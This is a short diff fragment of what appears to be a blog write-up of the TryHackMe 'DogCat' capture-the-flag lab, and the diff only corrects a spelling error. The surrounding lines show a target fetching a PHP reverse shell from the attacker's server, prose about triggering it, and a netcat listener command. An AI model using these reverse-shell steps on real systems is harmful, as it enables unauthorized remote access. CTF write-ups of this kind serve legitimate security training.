vandanrohatgi/blog-grave/_posts/2020-9-18-THM-DogCat.md

 10.10.24.222 - - [17/Sep/2020 17:32:40] "GET /php-reverse-shell.php HTTP/1.0" 200 -
 {%endhighlight%}

-So now that we have transfere the reverse shell, all we need to do is browse to it and we will hopefully get a netcat connection.
+So now that we have transferred the reverse shell, all we need to do is browse to it and we will hopefully get a netcat connection.

 {%highlight text%}
 nc -lvp 1234